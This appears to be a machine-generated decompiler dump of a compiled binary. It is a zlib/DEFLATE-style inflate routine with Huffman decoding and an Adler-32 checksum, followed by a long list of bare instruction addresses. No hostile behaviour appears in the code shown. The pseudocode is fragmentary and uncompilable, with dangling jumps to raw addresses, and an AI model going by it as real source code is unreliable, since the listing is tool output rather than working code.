									_t641 = (0x5e6ea9af * _t974 >> 0x20 >> 0xb) * 0x15b0;
									_t1053 = _t1052 >> 0x10;
									 *(_t1065 - 0x3c) = _t1053;
									_t978 =  *(_t1065 - 0x10) - _t641;
									__eflags =  *(_t1065 - 0x10);
									 *(_t1065 - 0x34) = _t978;
									if( *(_t1065 - 0x10) != 0) {
										L299:
										_t853 = _t978;
										do {
											L300:
											_t979 = 0;
											 *(_t1065 + 0x14) = 0;
											__eflags = _t853 - 7;
											if(_t853 > 7) {
												L301:
												goto 0x42149d;
												asm("int3");
												asm("int3");
												asm("int3");
												L302:
												_t1033 = _t1030 - _t641;
												__eflags = _t1033;
												do {
													L303:
													_t979 =  &(_t979[2]);
													_t879 = _t877 + ( *_t641 & 0x000000ff);
													_t880 = _t879 + ( *( *(_t1065 + 0x10) + 1) & 0x000000ff);
													_t881 = _t880 + ( *(2 +  *(_t1065 + 0x10)) & 0x000000ff);
													_t882 = _t881 + ( *( *(_t1065 + 0x10) + 3) & 0x000000ff);
													_t883 = _t882 + ( *( *(_t1065 + 0x10) + 4) & 0x000000ff);
													_t884 = _t883 + ( *( *(_t1065 + 0x10) + 5) & 0x000000ff);
													_t885 = _t884 + ( *( *(_t1065 + 0x10) + 6) & 0x000000ff);
													_t877 = _t885 + ( *( *(_t1065 + 0x10) + 7) & 0x000000ff);
													_t671 =  *(_t1065 + 0x10) + 8;
													_t1053 = _t1053 + _t879 + _t880 + _t881 + _t882 + _t883 + _t884 + _t885 + _t877;
													 *(_t1065 + 0x10) = _t671;
													__eflags = _t1033 + _t671 - _t853;
													_t641 =  *(_t1065 + 0x10);
												} while (_t1033 + _t671 < _t853);
												 *(_t1065 + 0x14) = _t979;
												 *(_t1065 - 0x3c) = _t1053;
											}
											L305:
											_t1030 = 0;
											 *((intOrPtr*)(_t1065 + 8)) = 0;
											__eflags = _t979 - _t853;
											if(_t979 < _t853) {
												L306:
												__eflags = _t853 - _t979 - 2;
												if(_t853 - _t979 >= 2) {
													L307:
													_t651 =  *(_t1065 + 0x14);
													_t1056 =  *(_t1065 + 0x10);
													_t854 = 0;
													_t990 = (_t853 - _t651 - 2 >> 1) + 1;
													__eflags = _t990;
													 *(_t1065 + 0x14) = _t651 + _t990 * 2;
													do {
														L308:
														_t878 = _t877 + ( *_t1056 & 0x000000ff);
														_t654 =  *(_t1056 + 1) & 0x000000ff;
														_t1030 = _t1030 + _t878;
														_t1056 = 2 + _t1056;
														_t877 = _t878 + _t654;
														_t854 = _t854 + _t877;
														_t990 = _t990 - 1;
														__eflags = _t990;
													} while (_t990 != 0);
													_t979 =  *(_t1065 + 0x14);
													 *(_t1065 + 0x10) = _t1056;
													_t1053 =  *(_t1065 - 0x3c);
													 *((intOrPtr*)(_t1065 + 8)) = _t854;
													_t853 =  *(_t1065 - 0x34);
												}
												L310:
												__eflags = _t979 - _t853;
												if(_t979 < _t853) {
													_t984 =  *(_t1065 + 0x10);
													_t877 = _t877 + ( *_t984 & 0x000000ff);
													_t1053 = _t1053 + _t877;
													_t985 =  &(_t984[1]);
													__eflags = _t985;
													 *(_t1065 + 0x10) = _t985;
												}
												L312:
												_t641 =  *((intOrPtr*)(_t1065 + 8)) + _t1030;
												_t1053 = _t1053 + _t641;
												__eflags = _t1053;
											}
											L313:
											L314:
											_t877 = _t877 + (_t641 * _t877 >> 0x20 >> 0xf) * 0xffff000f;
											_t641 = (0x80078071 * _t1053 >> 0x20 >> 0xf) * 0xffff000f;
											_t1053 = _t1053 + _t641;
											_t586 = _t1065 - 0x10;
											 *_t586 =  *(_t1065 - 0x10) - _t853;
											__eflags =  *_t586;
											_t853 = 0x15b0;
											 *(_t1065 - 0x3c) = _t1053;
											 *(_t1065 - 0x34) = 0x15b0;
										} while ( *_t586 != 0);
										goto 0x4214c6;
										asm("int3");
									}
									L316:
									_t1055 = (_t1053 << 0x10) + _t877;
									 *(_t1030 + 0x1c) = _t1055;
									__eflags = _t851;
									if(_t851 == 0) {
										__eflags =  *(_t1065 + 0x18) & 0x00000001;
										if(( *(_t1065 + 0x18) & 0x00000001) != 0) {
											__eflags = _t1055 -  *(_t1030 + 0x10);
											_t851 =  !=  ? 0xfffffffe : _t851;
											__eflags = _t851;
										}
									}
								}
							}
							L319:
							return _t851;
							L320:
							L58:
							__eflags = _t1050 - 0xf;
							if(_t1050 >= 0xf) {
								L75:
								_t603 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t603;
								__eflags = _t603;
								if(_t603 < 0) {
									L77:
									goto 0x421372;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t605 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t847 =  *((short*)(_t1030 + 0x960 + ((_t605 & 0x00000001) +  !_t847) * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L76:
									_t860 = _t603 >> 9;
									_t618 = _t603 & 0x000001ff;
									 *(_t1065 - 8) = _t618;
								}
								L80:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 - 0x100;
								if(_t861 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t769 =  *(_t1065 - 0x10);
									__eflags = _t769 -  *((intOrPtr*)(_t1065 - 0x40));
									if(_t769 >=  *((intOrPtr*)(_t1065 - 0x40))) {
										L240:
										 *(_t1065 - 0xc) = 2;
										 *_t1030 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t769 = _t861;
										 *(_t1065 - 0x10) = _t769 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t860 - 2;
								if(_t860 >= 2) {
									L73:
									_t969 =  *(_t847 + 1) & 0x000000ff;
									_t625 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									_t860 = _t1050;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | _t969 << _t1050 + 0x00000008 | _t625 << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t618 = _t968 & 0x000003ff;
										_t1031 =  *((short*)(_t1030 + 0x160 + _t618 * 2));
										__eflags = _t1031;
										if(_t1031 < 0) {
											L64:
											__eflags = _t1050 - 0xa;
											if(_t1050 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1065 - 0x1c) = _t860;
												while(1) {
													L67:
													_t1031 =  *((short*)( *(_t1065 - 0x14) + 0x960 + ((_t968 >> _t860 & 0x00000001) +  !_t1031) * 2));
													_t860 =  *(_t1065 - 0x1c) + 1;
													 *(_t1065 - 0x1c) = _t860;
													__eflags = _t1031;
													if(_t1031 >= 0) {
														goto L74;
													}
													L68:
													_t618 = _t860 + 1;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1035 = _t1031 >> 9;
											__eflags = _t1035;
											if(_t1035 == 0) {
												L69:
												_t1030 =  *(_t1065 - 0x14);
												L70:
												__eflags = _t847 -  *(_t1065 - 0x20);
												if(_t847 >=  *(_t1065 - 0x20)) {
													L239:
													 *_t1030 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1050 - _t1035;
												if(_t1050 >= _t1035) {
													L74:
													_t1030 =  *(_t1065 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t860 = _t1050;
										_t675 = ( *_t847 & 0x000000ff) << _t860;
										_t847 = _t847 + 1;
										_t968 = _t968 | _t675;
										 *(_t1065 - 0x18) = _t847;
										_t1050 = _t1050 + 8;
										 *(_t1065 - 4) = _t968;
										__eflags = _t1050 - 0xf;
									} while (_t1050 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1065 - 0xc) = 0x40 + _t600 * 0xda0 + _t1030;
					memset(_t1065 - 0xd0, 0, 0x40);
					memset( *(_t1065 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1065 - 0xc) + 0x920, 0, 0x480);
					_t903 = 0;
					_t1068 = _t1068 + 0x24;
					_t1003 = _t1030 + ( *(_t1030 + 0x18) + 0xb) * 4;
					 *(_t1065 - 0x44) = _t1003;
					if( *_t1003 > 0) {
						L143:
						_t1030 =  *(_t1065 - 0xc);
						do {
							L144:
							_t845 =  *(_t903 + _t1030) & 0x000000ff;
							_t903 = _t903 + 1;
							 *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) =  *((intOrPtr*)(_t1065 + _t845 * 4 - 0xd0)) + 1;
						} while (_t903 <  *_t1003);
					}
					L145:
					goto 0x4213d7;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1065 - 0x8c) = _t903;
					 *(_t1065 - 0x90) = _t903;
					 *(_t1065 - 0x2c) = _t903;
					 *(_t1065 - 0x30) = _t903;
					do {
						L147:
						_t782 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd4));
						_t905 = _t903 + _t782 + _t903 + _t782;
						_t1030 = _t1030 + _t782;
						_t783 =  *((intOrPtr*)(_t1065 + _t1003 - 0xd0));
						 *(_t1065 - 0x30) =  *(_t1065 - 0x30) + _t783;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x90)) = _t905;
						_t784 =  *((intOrPtr*)(_t1065 + _t1003 - 0xcc));
						_t907 = _t905 + _t783 + _t905 + _t783;
						 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) + _t784;
						 *((intOrPtr*)(_t1065 + _t1003 - 0x8c)) = _t907;
						_t903 = _t907 + _t784 + _t907 + _t784;
						 *(_t1065 + _t1003 - 0x88) = _t903;
						_t1003 = _t1003 + 0xc;
					} while (_t1003 <= 0x40);
					 *(_t1065 - 0x4c) = _t903;
					 *(_t1065 - 0x24) = _t1030;
					_t1030 =  *(_t1065 - 0x14);
					_t910 =  *(_t1065 - 0x24) +  *(_t1065 - 0x2c) +  *(_t1065 - 0x30);
					if( *(_t1065 - 0x4c) == 0x10000 || _t910 <= 1) {
						L150:
						_t787 =  *(_t1065 - 0x44);
						 *(_t1065 - 0x30) = 0xffffffff;
						 *(_t1065 - 0x4c) = 0;
						if( *_t787 > 0) {
							L151:
							_t1064 =  *(_t1065 - 0x4c);
							do {
								L152:
								L153:
								_t922 =  *(_t1064 + _t787) & 0x000000ff;
								 *(_t1065 - 0x44) = _t922;
								if(_t922 != 0) {
									L154:
									_t824 =  *(_t1065 + _t922 * 4 - 0x90);
									 *(_t1065 - 0x2c) = _t824;
									 *(_t1065 + _t922 * 4 - 0x90) = _t824 + 1;
									 *(_t1065 - 0x24) = _t922;
									if(_t922 != 0) {
										L155:
										do {
											L156:
											 *(_t1065 - 0x2c) =  *(_t1065 - 0x2c) >> 1;
											_t844 =  *(_t1065 - 0x24) - 1;
											_t1003 = _t1003 + _t1003 |  *(_t1065 - 0x2c) & 0x00000001;
											 *(_t1065 - 0x24) = _t844;
										} while (_t844 != 0);
										_t922 =  *(_t1065 - 0x44);
									}
									L158:
									if(_t922 > 0xa) {
										L164:
										_t828 =  *(_t1065 - 0xc) + 0x120 + (_t1003 & 0x000003ff) * 2;
										_t847 =  *(_t1065 - 0x30);
										 *(_t1065 - 0x44) = _t828;
										_t829 =  *_t828;
										 *(_t1065 - 0x2c) = _t829;
										__eflags = _t829;
										if(_t829 == 0) {
											 *( *(_t1065 - 0x44)) = _t847;
											_t829 = _t847;
											_t847 = _t847 - 2;
											__eflags = _t847;
											 *(_t1065 - 0x2c) = _t829;
											 *(_t1065 - 0x30) = _t847;
										}
										L166:
										_t1011 = _t1003 >> 9;
										__eflags = _t922 - 0xb;
										if(_t922 > 0xb) {
											L167:
											_t923 = _t922 + 0xfffffff5;
											__eflags = _t923;
											 *(_t1065 - 0x24) = _t923;
											_t924 =  *(_t1065 - 0x2c);
											do {
												L168:
												_t1011 = _t1011 >> 1;
												_t834 = 0x48f - _t924 - (_t1011 & 0x00000001);
												_t927 =  *( *(_t1065 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t927;
												if(_t927 != 0) {
													_t924 = _t927;
												} else {
													 *( *(_t1065 - 0xc) + _t834 * 2) = _t847;
													_t835 =  *(_t1065 - 0x30);
													_t924 = _t835;
													_t836 = _t835 - 2;
													 *(_t1065 - 0x30) = _t836;
													_t847 = _t836;
												}
												L171:
												_t361 = _t1065 - 0x24;
												 *_t361 =  *(_t1065 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1065 - 0x2c) = _t924;
											_t829 = _t924;
										}
										L173:
										_t1003 = (_t1011 >> 0x00000001 & 0x00000001) - _t829;
										__eflags = _t1003;
										 *( *(_t1065 - 0xc) + 0x91e + _t1003 * 2) = _t1064;
									} else {
										L159:
										_t841 = (_t922 << 0x00000009 | _t1064) & 0x0000ffff;
										 *(_t1065 - 0x44) = _t841;
										if(_t1003 < 0x400) {
											L160:
											goto 0x421401;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t842 = _t841 << _t922;
											 *(_t1065 - 0x4c) = _t842 + _t842;
											_t932 =  *(_t1065 - 0xc) + _t1003 * 2 + 0x120;
											do {
												L162:
												 *_t932 = _t1030;
												_t1003 = _t1003 + _t842;
												_t932 =  &(_t932[ *(_t1065 - 0x4c)]);
											} while (_t1003 < 0x400);
											_t1030 =  *(_t1065 - 0x14);
										}
									}
								}
								L174:
								_t787 =  *(_t1030 + 0x18);
								_t1064 = _t1064 + 1;
							} while (_t1064 <  *((intOrPtr*)(_t1030 + 0x2c + _t787 * 4)));
							goto 0x421417;
							asm("int3");
						}
						L176:
						if( *(_t1030 + 0x18) != 2) {
							L217:
							 *(_t1030 + 0x18) =  *(_t1030 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t911 = 0;
							while(1) {
								L178:
								_t1004 =  *(_t1065 - 4);
								while(1) {
									L179:
									 *(_t1065 - 8) = _t911;
									if(_t911 >=  *(_t1030 + 0x30) +  *(_t1030 + 0x2c)) {
										break;
									}
									L180:
									if(_t1064 >= 0xf) {
										L197:
										_t802 =  *((short*)(_t1030 + 0x1ca0 + (_t1004 & 0x000003ff) * 2));
										 *(_t1065 - 0x28) = _t802;
										if(_t802 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1065 - 0x28) =  !( *(_t1065 - 0x28));
												_t804 = _t1004 >> _t911;
												_t911 = _t911 + 1;
												_t618 =  *((short*)(_t1030 + 0x24a0 + ((_t804 & 0x00000001) +  *(_t1065 - 0x28)) * 2));
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t618;
											} while (__eflags < 0);
										} else {
											L198:
											_t911 = _t802 >> 9;
											_t618 = _t802 & 0x000001ff;
											 *(_t1065 - 0x28) = _t618;
										}
										L202:
										_t1004 = _t1004 >> _t911;
										_t1050 = _t1064 - _t911;
										 *(_t1065 - 4) = _t1004;
										 *(_t1065 - 0x1c) = _t1050;
										if(_t618 >= 0x10) {
											L204:
											if(__eflags != 0) {
												L207:
												_t912 =  *((char*)(_t618 + 0x410ff0));
												 *(_t1065 - 0x38) = _t912;
												__eflags = _t1050 - _t912;
												if(_t1050 >= _t912) {
													L211:
													_t1050 = _t1050 - _t912;
													 *(_t1065 - 0x1c) = _t1050;
													_t913 =  *(_t1065 - 0x14);
													_t1046 = ((0x00000001 << _t912) - 0x00000001 & _t1004) +  *((char*)(_t618 + 0x410ff8));
													__eflags =  *(_t1065 - 0x28) - 0x10;
													_t808 =  *(_t1065 - 8);
													 *(_t1065 - 4) = _t1004 >> _t912;
													if(__eflags != 0) {
														_t1007 = 0;
														__eflags = 0;
													} else {
														_t1007 =  *(_t808 + _t913 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t808 + _t913 + 0x2924, _t1007, _t1046);
													_t1068 = _t1068 + 0xc;
													_t911 =  *(_t1065 - 8) + _t1046;
													_t1030 =  *(_t1065 - 0x14);
													L178:
													_t1004 =  *(_t1065 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t847 -  *(_t1065 - 0x20);
														if(_t847 >=  *(_t1065 - 0x20)) {
															break;
														}
														L209:
														_t618 = ( *_t847 & 0x000000ff) << _t1050;
														_t847 = _t847 + 1;
														_t912 =  *(_t1065 - 0x38);
														_t1004 = _t1004 | _t618;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 0x18) = _t847;
														 *(_t1065 - 4) = _t1004;
														__eflags = _t1050 - _t912;
														if(_t1050 < _t912) {
															continue;
														} else {
															L210:
															_t618 =  *(_t1065 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1030 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t812 =  *(_t1065 - 8);
												__eflags = _t812;
												if(_t812 == 0) {
													L268:
													_t689 = _t812 | 0xffffffff;
													 *_t1030 = 0x11;
													goto L291;
												} else {
													L206:
													_t618 =  *(_t1065 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t917 =  *(_t1065 - 8);
											 *(_t1030 + 0x2924 + _t917) = _t618;
											_t911 = _t917 + 1;
											continue;
										}
									} else {
										L181:
										if( *(_t1065 - 0x20) - _t847 >= 2) {
											L195:
											_t1008 =  *(_t847 + 1) & 0x000000ff;
											_t815 =  *_t847 & 0x000000ff;
											_t847 = _t847 + 2;
											_t911 = _t1064;
											 *(_t1065 - 0x18) = _t847;
											 *(_t1065 - 4) =  *(_t1065 - 4) | _t1008 << _t1064 + 0x00000008 | _t815 << _t911;
											_t1064 = _t1064 + 0x10;
											__eflags = _t1064;
											_t1004 =  *(_t1065 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t618 = _t1004 & 0x000003ff;
												_t1047 =  *((short*)(_t1030 + 0x1ca0 + _t618 * 2));
												if(_t1047 < 0) {
													L186:
													__eflags = _t1064 - 0xa;
													if(__eflags <= 0) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1065 - 0x24) = _t911;
														while(1) {
															L189:
															_t1047 =  *((short*)( *(_t1065 - 0x14) + 0x24a0 + ((_t1004 >> _t911 & 0x00000001) +  !_t1047) * 2));
															_t911 =  *(_t1065 - 0x24) + 1;
															 *(_t1065 - 0x24) = _t911;
															__eflags = _t1047;
															if(__eflags >= 0) {
																goto L196;
															}
															L190:
															_t618 = _t911 + 1;
															__eflags = _t1064 - _t618;
															if(__eflags >= 0) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1049 = _t1047 >> 9;
													if(_t1049 == 0) {
														L191:
														_t1030 =  *(_t1065 - 0x14);
														L192:
														if(_t847 >=  *(_t1065 - 0x20)) {
															L250:
															 *_t1030 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														if(_t1064 >= _t1049) {
															L196:
															_t1030 =  *(_t1065 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t911 = _t1064;
												_t819 = ( *_t847 & 0x000000ff) << _t911;
												_t847 = _t847 + 1;
												_t1004 = _t1004 | _t819;
												 *(_t1065 - 0x18) = _t847;
												_t1064 = _t1064 + 8;
												 *(_t1065 - 4) = _t1004;
											} while (_t1064 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1005 =  *(_t1030 + 0x2c);
								_t791 =  *(_t1030 + 0x30) + _t1005;
								__eflags = _t791 - _t911;
								if(_t791 != _t911) {
									L269:
									_t689 = _t791 | 0xffffffff;
									 *_t1030 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1030 + 0x40, _t1030 + 0x2924, _t1005);
									_t797 =  *(_t1030 + 0x2c) + 0x2924 + _t1030;
									__eflags = _t797;
									memcpy(_t1030 + 0xde0, _t797,  *(_t1030 + 0x30));
									_t1068 = _t1068 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L267:
						 *(_t1065 - 0xc) = 0xffffffff;
						 *_t1030 = 0x23;
						goto L292;
					}
					goto L295;
				}
			}

0x00405a85
0x00405a85
0x00405a85
0x00405a86
0x00405a88
0x00405a8a
0x00405a8c
0x00405a8d
0x00405a8f
0x00405a91
0x00405a98
0x00405a9e
0x00405aa6
0x00405aa9
0x00405aae
0x00405ab3
0x00405ab8
0x00405abd
0x00405ac5
0x00405acd
0x00405ad5
0x00405add
0x00405ae5
0x00405aeb
0x00405af3
0x00405af7
0x00405afc
0x00405b01
0x00405b06
0x00405b0b
0x00405b10
0x00405b15
0x00405b1d
0x00405b22
0x00405b2a
0x00405b34
0x00405b3e
0x00405c49
0x00405c49
0x00405c49
0x00405c4e
0x00000000
0x00000000
0x004060ee
0x004060ee
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x004055f6
0x004055fc
0x004055ff
0x00405602
0x00000000
0x00405608
0x00405608
0x00405608
0x0040560b
0x0040560d
0x00405611
0x00405613
0x00405616
0x0040561e
0x00405623
0x00405626
0x00405626
0x00405629
0x00405629
0x00405633
0x0040563b
0x0040563e
0x00405640
0x00405649
0x00405649
0x0040564e
0x0040564f
0x00405650
0x00405651
0x00405651
0x00405655
0x00405657
0x0040565b
0x0040565d
0x00405665
0x00405665
0x00405669
0x0040566c
0x00405642
0x00405642
0x00405644
0x00405644
0x0040566f
0x0040566f
0x00405671
0x00405673
0x00405676
0x00405679
0x0040567f
0x0040584a
0x0040584a
0x00405850
0x00405853
0x00405859
0x004060f6
0x004060f6
0x004060fd
0x00406103
0x00406109
0x0040610c
0x0040610f
0x00406111
0x0040614e
0x0040614e
0x00406151
0x00405404
0x0040540b
0x00405413
0x00405416
0x00405418
0x00405426
0x00405426
0x0040542b
0x0040542c
0x0040542d
0x00405430
0x00405430
0x00405434
0x00405436
0x0040543c
0x00405444
0x00405444
0x00405448
0x0040544b
0x0040544e
0x0040541a
0x0040541a
0x0040541c
0x0040541f
0x0040541f
0x00405451
0x00405451
0x00405453
0x00405455
0x0040545c
0x00405463
0x00405466
0x00405469
0x0040546c
0x0040546e
0x004054ae
0x004054b1
0x004054b4
0x004054b7
0x004054b9
0x004054c5
0x004054c5
0x004054cd
0x004054d0
0x004054d5
0x004054d8
0x004054dc
0x004054df
0x004054e1
0x004054e4
0x0040551f
0x0040551f
0x00405522
0x00405586
0x00405586
0x0040558b
0x00405590
0x00405590
0x00405593
0x00405596
0x0040559c
0x0040559f
0x004055a3
0x004055a6
0x004055a9
0x004055ac
0x004055ac
0x00000000
0x00405524
0x00405524
0x00405524
0x00405527
0x00000000
0x00405529
0x00405529
0x00405529
0x0040552e
0x00405534
0x00405536
0x00405539
0x00405540
0x00405540
0x00405542
0x00405544
0x00405547
0x0040554a
0x0040554d
0x00405550
0x00405550
0x00405554
0x00405557
0x0040555d
0x00405560
0x00405563
0x00405566
0x00405569
0x0040556c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040556c
0x00405527
0x00000000
0x004054e6
0x004054e6
0x004054e6
0x004054e6
0x004054e8
0x004054e9
0x004054ec
0x004054ee
0x00000000
0x00000000
0x004054f4
0x004054f7
0x004054fa
0x004061ff
0x004061ff
0x00406206
0x00000000
0x00405500
0x00405500
0x00405512
0x00405515
0x00405518
0x0040551a
0x00000000
0x0040551a
0x00000000
0x004054fa
0x004055e8
0x004055e8
0x004055eb
0x004055ed
0x004055f0
0x00000000
0x00000000
0x00000000
0x004055f0
0x00000000
0x004055e8
0x004054bb
0x004054bb
0x004054bb
0x004054bf
0x004063a4
0x004063a4
0x004063a7
0x00000000
0x00000000
0x00000000
0x00000000
0x004054bf
0x00405470
0x00405470
0x00405470
0x00405472
0x00405497
0x0040549c
0x004054a1
0x004054a3
0x004054a5
0x004054a5
0x004054a5
0x004054a8
0x004054ab
0x00000000
0x00405474
0x00405474
0x00405474
0x00405474
0x00405477
0x00000000
0x00000000
0x0040547d
0x00405482
0x00405484
0x00405485
0x00405488
0x0040548a
0x0040548d
0x00405490
0x00405493
0x00405495
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405495
0x0040633c
0x0040633c
0x00000000
0x0040633c
0x00405472
0x00406157
0x00406157
0x0040615c
0x0040615f
0x004061d6
0x004061d6
0x004061dd
0x004061e0
0x004061e3
0x004061e8
0x004061ee
0x004061f1
0x004061f4
0x004061f7
0x00000000
0x00406161
0x00406161
0x00406168
0x00406170
0x00406173
0x00406175
0x0040618f
0x0040618f
0x00406192
0x00000000
0x00406198
0x00406198
0x0040619d
0x0040619d
0x004061a0
0x004061a0
0x004061ae
0x004061b9
0x004061ba
0x004061bd
0x004061c0
0x004061c2
0x00000000
0x00000000
0x004061c8
0x004061c8
0x004061c9
0x004061cb
0x00000000
0x004061d1
0x004061d1
0x004061d1
0x00000000
0x004061d1
0x00000000
0x004061cb
0x00000000
0x004061a0
0x00406177
0x00406177
0x00406177
0x0040617a
0x0040617c
0x004053df
0x004053df
0x004053e2
0x00406347
0x00406347
0x00000000
0x00000000
0x00000000
0x00000000
0x00406182
0x00406182
0x00406182
0x00406184
0x00000000
0x0040618a
0x0040618a
0x00000000
0x0040618a
0x00406184
0x0040617c
0x00000000
0x004053e8
0x004053eb
0x004053ed
0x004053ef
0x004053f0
0x004053f2
0x004053f5
0x004053f8
0x004053fb
0x004053fb
0x00406161
0x00000000
0x0040615f
0x00406113
0x00406113
0x00406113
0x00406115
0x0040613a
0x0040613f
0x0040613f
0x00406144
0x00406146
0x00406148
0x00406148
0x00406148
0x0040614b
0x00000000
0x00406117
0x00406117
0x00406117
0x00406117
0x0040611a
0x00000000
0x00000000
0x00406120
0x00406125
0x00406127
0x00406128
0x0040612b
0x0040612d
0x00406130
0x00406133
0x00406136
0x00406138
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406138
0x00406331
0x00406331
0x00000000
0x00406331
0x00406115
0x0040585f
0x0040585f
0x0040585f
0x0040585f
0x00405863
0x00000000
0x00000000
0x00405869
0x00405869
0x0040586c
0x0040588f
0x00405891
0x00405894
0x00405897
0x0040589a
0x0040589d
0x0040589d
0x0040589f
0x004058a2
0x004058a5
0x004058a8
0x00405a6b
0x00405a6b
0x00405a6e
0x00406364
0x00406364
0x0040636b
0x00000000
0x00405a74
0x00405a74
0x00405a74
0x00405a77
0x00405b46
0x00405b46
0x00405b46
0x00405b48
0x00405b48
0x00405b48
0x00405b4b
0x00405b4e
0x00000000
0x00000000
0x00405b54
0x00405b54
0x00405b5b
0x00405b5e
0x00405b60
0x00405b8f
0x00405b8f
0x00405b9a
0x00405ba2
0x00405ba5
0x00405ba8
0x00405baf
0x00405bb1
0x00405bb3
0x00405bb5
0x00405bb8
0x00405bc2
0x00405bc5
0x00405bc7
0x00405bca
0x00000000
0x00405b62
0x00405b62
0x00405b62
0x00405b62
0x00405b65
0x00000000
0x00000000
0x00405b6b
0x00405b70
0x00405b72
0x00405b73
0x00405b76
0x00405b78
0x00405b7b
0x00405b7e
0x00405b81
0x00405b88
0x00405b8b
0x00405b8d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b8d
0x00406285
0x00406285
0x00000000
0x00406285
0x00000000
0x00405b60
0x00405bd0
0x00405bd5
0x00405bde
0x00405be4
0x00405be7
0x00405bea
0x00405bea
0x00405bec
0x00405bec
0x00405bec
0x00405bef
0x00405bf2
0x00000000
0x00000000
0x00405bf4
0x00405bf4
0x00405bf7
0x00405c1a
0x00405c1f
0x00405c22
0x00405c25
0x00405c28
0x00405c2b
0x00405c2e
0x00405c35
0x00405c3f
0x00000000
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bf9
0x00405bfc
0x00000000
0x00000000
0x00405c02
0x00405c07
0x00405c09
0x00405c0a
0x00405c0c
0x00405c0f
0x00405c12
0x00405c15
0x00405c18
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c18
0x00406290
0x00406290
0x00000000
0x00406290
0x00000000
0x00405bf7
0x00405c42
0x00405c42
0x00000000
0x00405a7d
0x00405a7d
0x00405a7d
0x00405a82
0x00405a83
0x00405a84
0x00000000
0x00405a84
0x00405a77
0x004058ae
0x004058ae
0x004058b0
0x004058b3
0x004058b5
0x004058dc
0x004058de
0x004058e1
0x004058e3
0x004058e5
0x004058e8
0x004058e8
0x004058ea
0x004058ea
0x004058ea
0x004058ed
0x004058f0
0x00000000
0x00000000
0x004058f2
0x004058f2
0x004058f4
0x00405932
0x00405932
0x00405935
0x0040624f
0x0040624f
0x00000000
0x0040593b
0x0040593b
0x0040593b
0x0040593d
0x0040593e
0x00405945
0x00405946
0x00000000
0x00405946
0x004058f6
0x004058f6
0x004058f6
0x004058f9
0x0040591f
0x0040591f
0x00405926
0x00405929
0x0040592c
0x0040592d
0x00000000
0x004058fb
0x004058fb
0x004058fb
0x004058fb
0x004058fe
0x00000000
0x00000000
0x00405904
0x00405909
0x0040590b
0x0040590c
0x0040590e
0x00405911
0x00405914
0x00405917
0x0040591a
0x00000000
0x0040591c
0x0040591c
0x0040591c
0x00000000
0x0040591c
0x00000000
0x0040591a
0x00406244
0x00406244
0x00000000
0x00406244
0x004058f9
0x00000000
0x004058f4
0x0040594b
0x0040595e
0x00405965
0x0040597a
0x0040597d
0x00406352
0x00406352
0x00406359
0x00000000
0x00405983
0x00405983
0x00405983
0x00405986
0x00405986
0x00405986
0x00405988
0x00000000
0x00000000
0x0040598e
0x0040598e
0x00405990
0x004059ec
0x004059ec
0x004059ef
0x004059ef
0x004059ef
0x004059f1
0x00000000
0x00000000
0x00405a01
0x00405a01
0x00405a04
0x00405a06
